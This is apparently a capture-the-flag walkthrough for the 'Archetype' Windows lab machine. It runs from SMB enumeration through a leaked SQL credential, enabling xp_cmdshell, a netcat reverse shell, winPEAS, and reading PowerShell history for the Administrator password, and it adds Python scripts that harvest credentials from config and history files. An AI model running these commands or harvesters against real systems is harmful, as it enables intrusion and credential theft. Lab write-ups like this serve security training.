Archetype
#smbclient
#ms-sql-server
#impacket
nmap -sV -sC <ip_target>
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-24 15:37 WIB
Nmap scan report for 10.129.106.221
Host is up (0.37s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1078/tcp filtered avocent-proxy
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: ARCHETYPE
| NetBIOS_Domain_Name: ARCHETYPE
| NetBIOS_Computer_Name: ARCHETYPE
| DNS_Domain_Name: Archetype
| DNS_Computer_Name: Archetype
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-01-24T01:47:56
|_Not valid after: 2052-01-24T01:47:56
|_ssl-date: 2022-01-24T01:50:29+00:00; -6h48m24s from scanner time.
10012/tcp filtered unknown
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-01-24T01:50:12
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
| Computer name: Archetype
| NetBIOS computer name: ARCHETYPE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-01-23T17:50:14-08:00
| ms-sql-info:
| 10.129.106.221:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM
| number: 14.00.1000.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_clock-skew: mean: -5h12m23s, deviation: 3h34m41s, median: -6h48m24s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.05 seconds
SMB (445) is open, and so is Microsoft SQL Server 2017 on 1433.
- Enumerate SMB with smbclient
smbclient -N -L \\\\<ip_target>
-N : no password (null session)
-L : list the shares (services) the server offers
The share we can access anonymously is backups:
smbclient -N \\\\<ip_target>\\backups
smb: \> dir
smb: \> get prod.dtsConfig
cat prod.dtsConfig
<DTSConfiguration>
<DTSConfigurationHeading>
<DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
</DTSConfigurationHeading>
<Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
</Configuration>
</DTSConfiguration>
Credentials recovered from the connection string: Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc
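Pulling the login out of the file by hand works for one file; a share full of backups is easier to sweep with a parser. The following is an added example (not code from the original writeup) that parses a .dtsConfig and extracts the credentials from every ConnectionString property it contains, handling the braced and quoted values an OLE DB connection string may carry. The embedded sample is a trimmed copy of the prod.dtsConfig shown above; the script name and CLI usage are assumptions for this example.

```python
"""Added example, not code from the original writeup: parse an SSIS .dtsConfig
file and pull the credentials out of its connection strings.

A .dtsConfig is plain XML. Each <Configuration> element names the property it
sets (Path) and carries the value in <ConfiguredValue>. A connection string is
a ';'-separated list of key=value pairs, where a value wrapped in {...} or
quotes may itself contain ';' and must be kept intact."""
import re
import sys
import xml.etree.ElementTree as ET

# Trimmed copy of the prod.dtsConfig recovered from the backups share, kept
# inline so the example runs offline.
SAMPLE_DTSCONFIG = """<DTSConfiguration>
<DTSConfigurationHeading>
<DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
</DTSConfigurationHeading>
<Configuration ConfiguredType="Property" Path="\\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
</Configuration>
</DTSConfiguration>
"""

# key=value pairs; braced or quoted values are matched as a unit so an embedded ';' survives
_PAIR_RE = re.compile(r"""\s*(?P<key>[^=;]+?)\s*=\s*(?P<value>\{[^}]*\}|"[^"]*"|'[^']*'|[^;]*)\s*(?:;|$)""")


def parse_connection_string(conn_str):
    """Return the connection string as a dict with lower-cased keys."""
    pairs = {}
    for m in _PAIR_RE.finditer(conn_str):
        key = m.group("key").strip().lower()
        value = m.group("value").strip()
        if len(value) >= 2 and value[0] in "{\"'" and value[-1] in "}\"'":
            value = value[1:-1]  # drop the {...} / "..." / '...' wrapper
        pairs[key] = value
    return pairs


def extract_credentials(xml_text):
    """Return one record per ConnectionString property that carries a login."""
    root = ET.fromstring(xml_text)
    found = []
    for cfg in root.iter("Configuration"):
        path = cfg.get("Path", "")
        if "ConnectionString" not in path:
            continue
        value_el = cfg.find("ConfiguredValue")
        if value_el is None or not value_el.text:
            continue
        pairs = parse_connection_string(value_el.text)
        user = pairs.get("user id") or pairs.get("uid") or pairs.get("user")
        password = pairs.get("password") or pairs.get("pwd")
        if user is None and password is None:
            continue  # e.g. Integrated Security=SSPI: nothing reusable here
        found.append({
            "path": path,
            "server": pairs.get("data source") or pairs.get("server"),
            "database": pairs.get("initial catalog") or pairs.get("database"),
            "user": user,
            "password": password,
        })
    return found


if __name__ == "__main__":
    # Usage (assumed name): python3 dtsconfig_creds.py [file.dtsConfig ...]; no argument = inline sample
    # utf-8-sig strips the BOM that SSIS-generated files often start with
    sources = [open(p, encoding="utf-8-sig").read() for p in sys.argv[1:]] or [SAMPLE_DTSCONFIG]
    for text in sources:
        for cred in extract_credentials(text):
            print(f"{cred['server']}/{cred['database']}: {cred['user']} / {cred['password']}")
```

Run it over everything pulled from the share (`smbclient ... -c 'prompt; recurse; mget *'` then `python3 dtsconfig_creds.py *.dtsConfig`); records with a user but no password still point at the Data Source and database to try other credentials against.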
- Enumerate MS SQL Server
The Impacket toolkit includes a valuable Python script called mssqlclient.py that offers exactly this functionality.
Impacket
is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch, as well as parsed from raw data, and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library.
https://github.com/SecureAuthCorp/impacket
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip3 install .
# OR:
sudo python3 setup.py install
# In case you are missing some modules:
pip3 install -r requirements.txt
All the scripts used below are Impacket's example scripts: run them from the examples/ directory of the checkout (pip3 install . also puts them on PATH).
python3 mssqlclient.py -h
python3 mssqlclient.py ARCHETYPE/sql_svc@{TARGET_IP} -windows-auth
SQL> help
https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server
https://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
Check which server role our login holds (sysadmin is what allows changing server configuration):
SQL> SELECT is_srvrolemember('sysadmin');
Check whether xp_cmdshell is enabled; it is disabled by default, so the call fails with an error telling you to enable it via sp_configure:
SQL> EXEC xp_cmdshell 'net user';
Enable xp_cmdshell with sp_configure, as the error message above says (show advanced options has to be turned on first, otherwise xp_cmdshell is not exposed as a configurable option):
SQL> EXEC sp_configure 'show advanced options', 1;
SQL> RECONFIGURE;
SQL> sp_configure;   (optional: lists all options to confirm the change)
SQL> EXEC sp_configure 'xp_cmdshell', 1;
SQL> RECONFIGURE;
Verify:
SQL> xp_cmdshell "whoami"
- Reverse Shell
Concept
1. upload nc64.exe to the target
2. have nc64.exe run cmd.exe and connect back to our listener
http server (local) -> target -> listener (local)
Open a terminal and serve the binary:
sudo python3 -m http.server 80
In a new terminal tab, start the listener:
sudo nc -lvnp 443
We will use PowerShell because it has more features, so every command is run as powershell -c <command>:
SQL> xp_cmdshell "powershell -c pwd"
User flag location:
C:\Users\sql_svc\Desktop
Put the binary in a directory a regular user can write to:
SQL> xp_cmdshell "powershell -c dir C:\Users"
SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://<ip_local>/nc64.exe -outfile nc64.exe"
*don't forget to allow port 80 on the local machine (Linux ufw):
sudo ufw allow 80
Bind cmd.exe to the local listener:
SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe <ip_local> 443"
- Privilege Escalation
Windows privilege escalation, using winPEAS.
Send it to the target machine (from the reverse shell, switch to PowerShell first):
powershell
wget http://10.10.14.9/winPEASx64.exe -outfile winPEASx64.exe
Run it:
PS C:\Users\sql_svc\Downloads> .\winPEASx64.exe
Back in the listener shell, read the PowerShell command history:
cd C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\
type ConsoleHost_history.txt
This gives us the Administrator user name and password.
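Reading ConsoleHost_history.txt by eye works on one box; the added example below (not code from the writeup) does the same check programmatically, flagging history lines that carry a password in the common forms: net use with a password argument, ConvertTo-SecureString -AsPlainText, and -u/-p style switches such as psexec or sqlcmd take. The sample history is constructed for this example and is not the contents of the target's file; the script name is an assumption.

```python
"""Added example, not code from the original writeup: scan a PowerShell
ConsoleHost_history.txt for commands that carry a credential, which is the
check that turned up the Administrator password on this box.
The sample history below is constructed; it is not the target's file."""
import re
import sys

# Constructed sample, not the real history file
SAMPLE_HISTORY = """\
Get-ChildItem C:\\Users
net.exe use Z: \\\\fileserver\\backups /user:CORP\\svc_backup Winter2022!
net use \\\\fileserver\\finance Sup3rSecret! /user:CORP\\alice
net use Y: \\\\fileserver\\public * /user:CORP\\bob
$sec = ConvertTo-SecureString 'Summer2023?' -AsPlainText -Force
psexec.exe \\\\ws01 -u CORP\\helpdesk -p Help!Me2 cmd.exe
Get-Content .\\notes.txt
"""

# Every pattern has a 'password' group; 'user' is present where the syntax carries one.
PATTERNS = [
    # net use [drive:] \\server\share password /user:DOMAIN\name  (documented argument order)
    re.compile(r"net(?:\.exe)?\s+use\s+(?:\S+\s+)?\\\\\S+\s+(?P<password>[^\s/]\S*)\s+/user:(?P<user>\S+)", re.I),
    # net use ... /user:DOMAIN\name password  (also accepted by net.exe)
    re.compile(r"net(?:\.exe)?\s+use\b.*?/user:(?P<user>\S+)\s+(?P<password>[^\s/]\S*)", re.I),
    # ConvertTo-SecureString 'plain text' -AsPlainText
    re.compile(r"ConvertTo-SecureString\s+(?:-String\s+)?[\"']?(?P<password>[^\"'\s]+)[\"']?\s+-AsPlainText", re.I),
    # [-u NAME] -p / -pass / -password VALUE style switches (psexec, sqlcmd -U/-P, ...)
    re.compile(r"(?:-u(?:ser(?:name)?)?\s+(?P<user>\S+)\s+)?--?p(?:ass(?:word)?)?[\s:=]+[\"']?(?P<password>[^\"'\s]+)", re.I),
]


def find_credentials(history_text):
    """Return one hit per line that exposes a password: line number, user, password, command."""
    hits = []
    for lineno, line in enumerate(history_text.splitlines(), 1):
        for pat in PATTERNS:
            m = pat.search(line)
            if not m or m.group("password") == "*":  # '*' makes net.exe prompt; nothing leaked
                continue
            hits.append({"line": lineno, "user": m.groupdict().get("user"),
                         "password": m.group("password"), "command": line.strip()})
            break  # first matching pattern wins; one hit per line
    return hits


if __name__ == "__main__":
    # Usage (assumed name): python3 pshistory_creds.py [ConsoleHost_history.txt]; default is the sample
    text = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE_HISTORY
    for h in find_credentials(text):
        print(f"line {h['line']}: user={h['user']} password={h['password']}  <- {h['command']}")
```

The same scan is worth running defensively: PSReadline writes every interactive command to %APPDATA%\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt, so a password typed on the command line survives there for any later user of that account.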
Open a new terminal and log in with psexec.py using those credentials:
python3 psexec.py administrator@{TARGET_IP}
Root flag location:
C:\Users\Administrator\Desktop